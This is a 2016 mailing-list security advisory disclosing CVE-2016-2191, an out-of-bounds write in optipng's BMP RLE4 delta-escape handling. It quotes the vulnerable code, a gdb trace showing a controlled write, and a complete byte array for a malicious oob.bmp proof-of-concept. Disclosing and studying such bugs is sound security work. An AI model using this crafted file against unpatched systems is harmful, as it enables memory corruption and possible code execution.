Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Mon, 04 Apr 2016 23:33:09 +0700
From: Hans Jerry Illikainen <hji@...topia.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: CVE-2016-2191: optipng: invalid write

An invalid write may occur in optipng before version 0.7.6 while
processing bitmap images due to `crt_row' being (inc|dec)remented
without any boundary checking when encountering delta escapes.

optipng-0.7.5/src/pngxtern/pngxrbmp.c:
,----
| 210 static size_t
| 211 bmp_read_rows(png_bytepp begin_row, png_bytepp end_row, size_t row_size,
| 212               unsigned int compression, FILE *stream)
| 213 {
| ...
| 272       crt_row = begin_row;
| 273       for ( ; ; )
| 274       {
| 275          ch = getc(stream); b1 = (unsigned int)ch;
| 276          ch = getc(stream); b2 = (unsigned int)ch;
| 277          if (ch == EOF)
| 278             break;
| 279          if (b1 == 0)  /* escape */
| 280          {
| ...
| 307             else if (b2 == 2)  /* delta */
| 308             {
| 309                ch = getc(stream); b1 = (unsigned int)ch;  /* horiz. offset */
| 310                ch = getc(stream); b2 = (unsigned int)ch;  /* vert. offset */
| ...
| 314                if (b2 > (size_t)((end_row - crt_row) * inc))
| 315                   b2 = (unsigned int)((end_row - crt_row) * inc);
| 316                for ( ; b2 > 0; --b2)
| 317                {
| ...
| 319                   crt_row += inc;
| ...
| 322                }
| ...
| 324             }
| 325             else  /* b2 >= 3 bytes in absolute mode */
| 326             {
| 327                len = (b2 <= endn - crtn) ? b2 : (unsigned int)(endn - crtn);
| 328                if (bmp_fread_fn(*crt_row, crtn, len, stream) != len)
| 329                   break;
| 330                crtn += len;
| 331             }
| 332          }
| ...
| 352 }
`----

After `crt_row' has moved OOB, an invalid write may be triggered with
`bmp_fread_fn()' in absolute mode:

,----
| $ gdb --args optipng oob.bmp
| (gdb) r
|  ** Processing: oob.bmp
| 
| Program received signal SIGSEGV, Segmentation fault.
| __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:96
| 96  ../sysdeps/x86_64/multiarch/../memcpy.S: No such file or directory.
| 
| (gdb) bt
| #0  __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:96
| #1  0x00007ffff7a89003 in __GI__IO_file_xsgetn (fp=0x64a010, data=<optimized out>, n=4) at fileops.c:1371
| #2  0x00007ffff7a7e5f0 in __GI__IO_fread (buf=<optimized out>, size=1, count=4, fp=0x64a010) at iofread.c:42
| #3  0x000000000040b632 in bmp_rle4_fread (ptr=0x4141 <error: Cannot access memory at address 0x4141>, offset=0, len=8, stream=0x64a010) at pngxrbmp.c:170
| #4  0x000000000040baf6 in bmp_read_rows (begin_row=0x64e668, end_row=0x64a538, row_size=4, compression=2, stream=0x64a010) at pngxrbmp.c:328
| #5  0x000000000040cb0e in pngx_read_bmp (png_ptr=0x64a240, info_ptr=0x64a4b0, stream=0x64a010) at pngxrbmp.c:724
| #6  0x000000000040b352 in pngx_read_image (png_ptr=0x64a240, info_ptr=0x64a4b0, fmt_name_ptr=0x7fffffffbf10, fmt_long_name_ptr=0x0) at pngxread.c:130
| #7  0x00000000004043cc in opng_read_file (infile=0x64a010) at optim.c:939
| #8  0x000000000040586a in opng_optimize_impl (infile_name=0x7fffffffe86f "oob.bmp") at optim.c:1503
| #9  0x0000000000406749 in opng_optimize (infile_name=0x7fffffffe86f "oob.bmp") at optim.c:1853
| #10 0x0000000000402bf0 in process_files (argc=2, argv=0x7fffffffe638) at optipng.c:941
| #11 0x0000000000402cb5 in main (argc=2, argv=0x7fffffffe638) at optipng.c:975
| 
| (gdb) x/i $rip
| => 0x7ffff7aa3427 <__memcpy_sse2+55 at ../sysdeps/x86_64/multiarch/../memcpy.S:96>: mov    %ecx,(%rdi)
| (gdb) p/x $ecx
| $1 = 0x11223344
| (gdb) p/x $rdi
| $2 = 0x4141
| (gdb)
`----


oob.bmp
=======

,----
| unsigned char bmp[] = {
|     /* bmp header */
|     0x42, 0x4d,             /* BM */
|     0x00, 0x00, 0x00, 0x00, /* bmp size */
|     0x00, 0x00,             /* reserved */
|     0x00, 0x00,             /* reserved */
|     0x7a, 0x00, 0x00, 0x00, /* offset */
| 
|     /* dib header */
|     0x6c, 0x00, 0x00, 0x00, /* header_size (BITMAPV4HEADER) */
|     0x01, 0x00, 0x00, 0x00, /* width */
|     0x26, 0x08, 0x00, 0x00, /* height */
|     0x01, 0x00,             /* color planes */
|     0x04, 0x00,             /* bits per pixel */
|     0x02, 0x00, 0x00, 0x00, /* compression (RLE4) */
|     0x00, 0x00, 0x00, 0x00, /* size of bitmap */
|     0x00, 0x00, 0x00, 0x00, /* horizontal resolution */
|     0x00, 0x00, 0x00, 0x00, /* vertical resolution */
|     0x01, 0x00, 0x00, 0x00, /* number of colors */
|     0x00, 0x00, 0x00, 0x00, /* number of important colors */
|     0x00, 0x00, 0x00, 0x00, /* red mask */
|     0x00, 0x00, 0x00, 0x00, /* green mask */
|     0x00, 0x00, 0x00, 0x00, /* blue mask */
|     0x00, 0x00, 0x00, 0x00, /* alpha mask */
|     0x00, 0x00, 0x00, 0x00, /* color space type */
|     0x00, 0x00, 0x00, 0x00, /* x coordinate of red endpoint */
|     0x00, 0x00, 0x00, 0x00, /* y coordinate of red endpoint */
|     0x00, 0x00, 0x00, 0x00, /* z coordinate of red endpoint */
|     0x00, 0x00, 0x00, 0x00, /* x coordinate of green endpoint */
|     0x00, 0x00, 0x00, 0x00, /* y coordinate of green endpoint */
|     0x00, 0x00, 0x00, 0x00, /* z coordinate of green endpoint */
|     0x00, 0x00, 0x00, 0x00, /* x coordinate of blue endpoint */
|     0x00, 0x00, 0x00, 0x00, /* y coordinate of blue endpoint */
|     0x00, 0x00, 0x00, 0x00, /* z coordinate of blue endpoint */
|     0x00, 0x00, 0x00, 0x00, /* red gamma */
|     0x00, 0x00, 0x00, 0x00, /* green gamma */
|     0x00, 0x00, 0x00, 0x00, /* blue gamma */
| 
|     /*
|      * delta escape (0x00, 0x02), b1, b2
|      *
|      * The number of delta escapes required for crt_row to be moved
|      * beyond its allocated chunk depends on the image height.
|      *
|      * b1 is relevant in the last escape if the value at *crt_row is a
|      * non-writable address due to:
|      *
|      * dcrtn = (b1 < endn - crtn) ? (crtn + b1) : endn;
|      * [...]
|      * for ( ; b2 > 0; --b2)
|      * {
|      *     [...]
|      *     crt_row += inc;
|      *     crtn = 0
|      *     [...]
|      * }
|      * bmp_memset_fn(*crt_row, crtn, 0, dcrtn - crtn);
|      *
|      * For RLE4-encoded data, bmp_rle4_memset() bails if dcrtn - crtn == 0
|      */
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x11, 0xff,
|     0x00, 0x02, 0x00, 0xff,
| 
|     /*
|      * absolute mode (0x00, 0x03..0xff) followed by the value that's
|      * bmp_fread_fn() to *crt_row
|      */
|     0x00, 0xff, 0x44, 0x33, 0x22, 0x11
| };
`----


Solution
========

This issue has been assigned CVE-2016-2191 and is fixed in optipng
0.7.6.


-- 
Hans Jerry Illikainen

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.